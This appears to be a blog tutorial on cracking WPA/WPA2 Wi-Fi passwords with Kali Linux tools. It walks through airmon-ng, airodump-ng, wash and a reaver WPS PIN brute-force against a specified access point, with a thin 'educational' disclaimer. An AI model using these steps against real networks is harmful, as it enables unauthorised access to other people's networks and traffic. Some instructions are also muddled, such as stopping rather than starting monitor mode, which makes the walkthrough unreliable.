Unordered List

Crack / Hack WiFi WPA/WPA2 password using Backtrack or KaliLinux



 Warning: Please note that this tutorial is purely educational and I am not responsible for your actions. Knowledge doesn't mean you should do anything illegal. Don't crack any wifi router without authorization; otherwise, you will be put into the jail !

 I assume you have your Backtrack / KaliLinux already installed on your Windows using:

Virtual Machine (VirtualBox)

Or In dual boot


 Note: You'll need a compatible wireless adapter which supports packet injection (i recommend you to use an Alfa AWUS036H USB Adapter)

Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux

 Let's start with opening your terminal (CTRL+ALT+T) and type the command: '' airmon-ng '' to see the Wireless Card that we are going to use:

Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux


Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux


 - We'll need to stop our wireless monitor mode, type: '' airmon-ng stop wlan0 '' and hit enter:

Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux

 - Now let's scan the wireless traffic around us using the command: '' airodump-ng wlan0 ''


Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux


 - You can see all the access points with diffrent informations, R.M.A (Real Madrid :p) is my own WiFi that i'll crack (check all its informations: Mac Address = BSSID, encryption = ENC, channel = CH, authentification = AUTH ...)

Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux


 - Note that R.M.A is encrypted using WPA2 algorithm and running on channel 1, we will check if WPS is enabled or not using command:
 wash -i wlan0 -c <channel number> -C -s

 For me:
 wash -i wlan0 -c 1 -C -s

Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux


 - If 'No' proceed to next step, if 'Yes' you'll not be able to hack the WiFi !

 - This will be the last step where we are going to crack our WPA2 password using Reaver Tool
 Type the command using the access point informations gathered above:
reaver -i <your_interface> -b <wi-fi MAC address> --fail-wait=360

 For me it will be:
 reaver -i wlan0 -b BB:A3:86:32:86:6E --fail-wait=360

Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux

- This may take many hours depending on your PC performance and wifi signal power

Crack Hack WiFi WPA/WPA2 password Backtrack KaliLinux

 And what about WEP Encryption? See it on how to crack your wifi WEP password

 Please share the post with your friends if you like it
 Have you suggestions or questions? See you in comments below :)